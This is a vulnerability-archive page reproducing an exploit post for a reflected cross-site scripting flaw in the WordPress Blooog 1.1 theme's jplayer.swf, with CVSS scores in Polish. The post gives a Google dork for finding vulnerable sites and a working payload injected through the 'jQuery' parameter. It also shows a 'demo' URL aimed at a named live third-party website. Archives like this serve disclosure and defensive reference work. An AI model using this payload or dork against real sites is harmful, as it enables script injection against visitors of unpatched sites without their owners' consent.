WordPress Blooog 1.1 jplayer.swf Cross Site Scripting

2013-12-03 / 2013-12-19
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


Ogólna skala CVSS: 4.3/10
Znaczenie: 2.9/10
Łatwość wykorzystania: 8.6/10
Wymagany dostęp: Zdalny
Złożoność ataku: Średnia
Autoryzacja: Nie wymagana
Wpływ na poufność: Brak
Wpływ na integralność: Częściowy
Wpływ na dostępność: Brak

?X-------------------------------------------------------------X _____ _ _ _ _ _____ _____ _____ ___ _ _ _______ _______ ___________ |_ _| | | | \ | |_ _/ ___|_ _|/ _ \ | \ | | / __ \ \ / / ___ \ ___| ___ \ | | | | | | \| | | | \ `--. | | / /_\ \| \| | | / \/\ V /| |_/ / |__ | |_/ / | | | | | | . ` | | | `--. \ | | | _ || . ` | | | \ / | ___ \ __|| / | | | |_| | |\ |_| |_/\__/ /_| |_| | | || |\ | | \__/\ | | | |_/ / |___| |\ \ \_/ \___/\_| \_/\___/\____/ \___/\_| |_/\_| \_/ \____/ \_/ \____/\____/\_| \_| X-------------------------------------------------------------X [+] Author: TUNISIAN CYBER [+] Exploit Title: WordPress Blooog-v1.1 Theme Cross Site Scripting [+] Date: 2-12-2013 [+] Category: WebApp [+] Google Dork: inurl:"wp-content/themes/Blooog-v1.1" [+] Tested on: Win7 , ubuntu 13.04 ######################################################################################## P.O.C: http: //127.0.0.1/wp-content/themes/Blooog-v1.1/assets/js/jplayer.swf P4yl04D: ?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/1337day TUNISIAN CYBER/)// The link will be like this: http: //127.0.0.1/wp-content/themes/Blooog-v1.1/assets/js/jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/1337day TUNISIAN CYBER/)// Demo:(the rest at google,bing..) http://www.951collegeradio.com/wp-content/themes/Blooog-v1.1/assets/js/jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/1337day%20TUNISIAN%20CYBER/)// img:http://oi40.tinypic.com/33k6sqq.jpg ########################################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top